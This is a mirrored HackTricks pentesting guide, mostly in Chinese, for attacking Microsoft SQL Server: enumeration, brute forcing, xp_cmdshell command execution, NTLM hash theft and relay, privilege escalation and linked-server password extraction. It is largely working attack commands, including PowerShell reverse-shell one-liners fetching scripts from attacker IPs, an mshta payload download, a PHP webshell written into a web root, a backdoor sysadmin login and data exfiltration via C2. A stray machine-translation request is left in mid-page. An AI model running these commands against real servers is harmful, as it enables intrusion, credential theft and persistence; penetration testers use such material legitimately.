maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md

32 KiB
Raw Blame History

1433 - Pentesting MSSQL - Microsoft SQL Server

{{#include ../../banners/hacktricks-training.md}}

基本信息

来自 wikipedia:

Microsoft SQL Server 是由 Microsoft 开发的 关系型数据库 管理系统。作为一个数据库服务器,它是一个软件产品,其主要功能是根据其他软件应用程序的请求存储和检索数据——这些应用程序可以运行在同一台计算机上,也可以运行在通过网络(包括互联网)的另一台计算机上。

默认端口: 1433

1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM

默认 MS-SQL 系统表

  • master Database: 此数据库至关重要,因为它捕获了 SQL Server 实例的所有系统级详细信息。
  • msdb Database: SQL Server Agent 使用此数据库来管理警报和作业的调度。
  • model Database: 作为 SQL Server 实例上每个新数据库的蓝本,任何诸如大小、排序规则、恢复模式等更改都会反映在新创建的数据库中。
  • Resource Database: 一个只读数据库,包含 SQL Server 附带的系统对象。尽管这些对象在 Resource database 中物理存储,但在每个数据库的 sys schema 中以逻辑形式呈现。
  • tempdb Database: 作为临时对象或中间结果集的临时存储区。

枚举

自动枚举

如果你对该服务一无所知:

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping

Tip

如果你 没有 credentials,你可以尝试猜测它们。你可以使用 nmap 或 metasploit。注意如果使用已存在的用户名多次 login 失败,你可能会 block accounts

Metasploit (需要 creds)

#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

Brute force

手动枚举

登录

MSSQLPwner

# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt

# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt

# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go

常见枚举

# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master

#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'

#Enumerate links
enum_links
#Use a link
use_link [NAME]

获取用户

{{#ref}} types-of-mssql-users.md {{#endref}}

# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;

## Both of these select all the users of the current database (not the server).
## Interesting when you cannot acces the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers

获取权限

  1. 可保护对象 (Securable) 指由 SQL Server 管理以进行访问控制的资源。这些可分为:
  • 服务器 (Server) 示例包括数据库、登录名、端点、可用性组和服务器角色。
  • 数据库 (Database) 示例包括数据库角色、应用角色、架构、证书、全文目录和用户。
  • 架构 (Schema) 包括表、视图、存储过程、函数、同义词等。
  1. 权限 (Permission) 与 SQL Server 可保护对象相关的权限(如 ALTER、CONTROL 和 CREATE可以授予主体。权限的管理发生在两个层级
  • 服务器级别 (Server Level) 使用登录名
  • 数据库级别 (Database Level) 使用用户
  1. 主体 (Principal) 该术语指被授予对可保护对象权限的实体。主体主要包括登录名和数据库用户。对可保护对象的访问控制通过授予或拒绝权限,或将登录名和用户包含在具有访问权限的角色中来实现。
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'

Tricks

Execute OS Commands

Caution

注意:要能够执行命令,不仅需要 xp_cmdshell 启用,还需要对 xp_cmdshell 存储过程具有 EXECUTE 权限。你可以用以下命令找出谁(系统管理员除外)可以使用 xp_cmdshell

Use master
EXEC sp_helprotect 'xp_cmdshell'

# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net'

MSSQLPwner

# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname

# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname

# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname

# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate

基于 WMI 的远程 SQL 收集 (sqlcmd + CSV 导出)

操作者可以利用 WMI 从 IIS/应用层 转向 SQL 服务器,执行一个小的批处理脚本,该脚本对 MSSQL 进行身份验证并运行临时查询,结果导出为 CSV。这样收集过程保持简洁并与管理员的日常活动相融合。

示例 mssq.bat

@echo off
rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
set S=%1
set U=%2
set P=%3
set Q=%4
set O=%5
rem Remove headers, trim trailing spaces, CSV separator = comma
sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"

通过 WMI 远程调用它

wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"

PowerShell 替代方案

$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd

注意事项

  • sqlcmd 可能缺失;可退回使用 osql、PowerShell 的 Invoke-Sqlcmd或使用 System.Data.SqlClient 的 oneliner。
  • 小心使用引号;较长/复杂的查询更方便通过文件提供,或通过 Base64encoded 参数在 batch/PowerShell stub 内解码后提供。
  • Exfil CSV via SMB (e.g., copy from \SQLHOST\C$\Windows\Temp) or compress and move through your C2.

获取哈希密码

SELECT * FROM master.sys.syslogins;

窃取 NetNTLM hash / Relay attack

你应该启动一个 SMB server 来捕获在身份验证中使用的 hash例如 impacket-smbserverresponder)。

xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'

# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

MSSQLPwner

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Warning

你可以检查除了 sysadmins 之外谁有权限运行这些 MSSQL 函数:

Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';

使用诸如 responderInveigh 的工具可以 窃取 NetNTLM hash
你可以在以下内容中查看如何使用这些工具:

{{#ref}} ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {{#endref}}

滥用 MSSQL 受信任链接

阅读此文章 以获取有关如何滥用此功能的更多信息:

{{#ref}} ../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md {{#endref}}

写文件

要使用 MSSQL 写入文件,我们需要启用Ole Automation Procedures,这需要管理员权限,然后执行一些存储过程来创建文件:

# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE

sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE

使用 OPENROWSET 读取文件

默认情况下,MSSQL 允许对操作系统中该账户具有读取权限的任何文件进行读取。我们可以使用以下 SQL 查询:

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

然而,BULK 选项需要 ADMINISTER BULK OPERATIONSADMINISTER DATABASE BULK OPERATIONS 权限。

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';

基于错误的 SQLi 向量:

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

RCE/通过执行脚本读取文件 (Python and R)

MSSQL 可能允许你执行 scripts in Python and/or R。这些代码将由一个不同于使用 xp_cmdshell 来执行命令的 不同的用户 来执行。

Example trying to execute a 'R' "Hellow World!" not working:

Example using configured python to perform several actions:

# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

读取注册表

Microsoft SQL Server 提供了 多个扩展存储过程,它们允许你不仅与网络交互,还可以与文件系统甚至 Windows Registry

常规 实例感知
sys.xp_regread sys.xp_instance_regread
sys.xp_regenumvalues sys.xp_instance_regenumvalues
sys.xp_regenumkeys sys.xp_instance_regenumkeys
sys.xp_regwrite sys.xp_instance_regwrite
sys.xp_regdeletevalue sys.xp_instance_regdeletevalue
sys.xp_regdeletekey sys.xp_instance_regdeletekey
sys.xp_regaddmultistring sys.xp_instance_regaddmultistring
sys.xp_regremovemultistring sys.xp_instance_regremovemultistring 
# Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
# Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
# Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';

有关更多示例,请查看原始来源

RCE 使用 MSSQL User Defined Function - SQLHttp

可以在 MSSQL 中使用自定义函数加载 .NET dll。不过,这需要 dbo 访问,所以你需要以 sa 或 Administrator 角色 的身份连接到数据库。

请参见此链接 以查看示例。

RCE with autoadmin_task_agents

根据这篇文章,也可以加载远程 dll 并让 MSSQL 执行它,类似于:

update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";

请把要翻译的 README.md 内容粘贴到消息中,或确认我应直接从 src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md 读取并翻译。

using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;

namespace Class1
{
public class Class1 : TaskAgent
{
public Class1()
{

Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c ping localhost -t";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
process.WaitForExit();
}

public override void DoWork()
{

}

public override void ExternalJob(string command, LogBaseService jobLogger)
{

}

public override void Start(IServicesFactory services)
{

}

public override void Stop()
{

}


public void Test()
{

}
}
}

其他用于 RCE 的方法

还有其他方法可以获得命令执行,例如添加 extended stored proceduresCLR AssembliesSQL Server Agent Jobsexternal scripts

MSSQL 权限提升

从 db_owner 到 sysadmin

如果一个普通用户被授予对由 admin 用户拥有的数据库db_owner 角色(例如 sa),并且该数据库被配置为 trustworthy,那么该用户可以滥用这些权限来进行 privesc,因为在该数据库中创建的 stored procedures 可以以所有者(admin)的身份 execute

# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases

# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>

CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'

--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me

--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')

你可以使用一个 metasploit 模块:

msf> use auxiliary/admin/mssql/mssql_escalate_dbowner

或者一个 PS 脚本:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184

冒充其他用户

SQL Server 有一个特殊权限,名为 IMPERSONATE,它 使执行用户在上下文被重置或会话结束之前获得另一个用户或 login 的权限

# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned

# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

# If you can't find any users, make sure to check for links
enum_links
# If there is a link of interest, re-run the above steps on each link
use_link [NAME]

Tip

如果你可以 impersonate a user即使他不是 sysadmin你也应该检查 i该 user 是否有权访问 其他 databases 或 linked servers。

注意,一旦你成为 sysadmin你就可以 impersonate 任何其他人:

-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT

你可以使用一个 metasploit 模块执行此攻击:

msf> auxiliary/admin/mssql/mssql_escalate_execute_as

或使用 PS 脚本:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!

使用 MSSQL 进行持久化

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

Extracting passwords from SQL Server Linked Servers

攻击者可以从 SQL 实例中提取 SQL Server Linked Servers 的密码并以明文获取它们,从而使攻击者获得可用于在目标上取得更大立足点的凭据。用于提取并解密为 Linked Servers 存储的密码的脚本可以在 here

要使此利用生效,需要满足一些要求并进行相应配置。首先,你必须在机器上拥有 Administrator rights或具备管理 SQL Server Configurations 的能力。

在验证权限后,需要配置以下三项:

  1. 在 SQL Server 实例上启用 TCP/IP
  2. 添加一个 Start Up parameter在本例中将添加一个 trace flag即 -T7806。
  3. 启用 remote admin connection。

要自动化这些配置,this repository 包含所需脚本。除了为配置的每一步提供 powershell 脚本外,该仓库还包含一个将配置脚本与密码的提取和解密结合在一起的完整脚本。

有关此攻击的更多信息,请参阅以下链接: Decrypting MSSQL Database Link Server Passwords

Troubleshooting the SQL Server Dedicated Administrator Connection

本地权限提升

运行 MSSQL server 的用户会启用权限令牌 SeImpersonatePrivilege.
你很可能可以通过以下两种方法之一 escalate to Administrator

{{#ref}} ../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md {{#endref}}

{{#ref}} ../../windows-hardening/windows-local-privilege-escalation/juicypotato.md {{#endref}}

Shodan

  • port:1433 !HTTP

References

HackTricks 自动命令

Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
Port_Number:  1433     #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).

#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go

2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go

3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go




xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"


https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html

Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}

Entry_3:
Name: MSSQL consolesless mfs enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'

{{#include ../../banners/hacktricks-training.md}}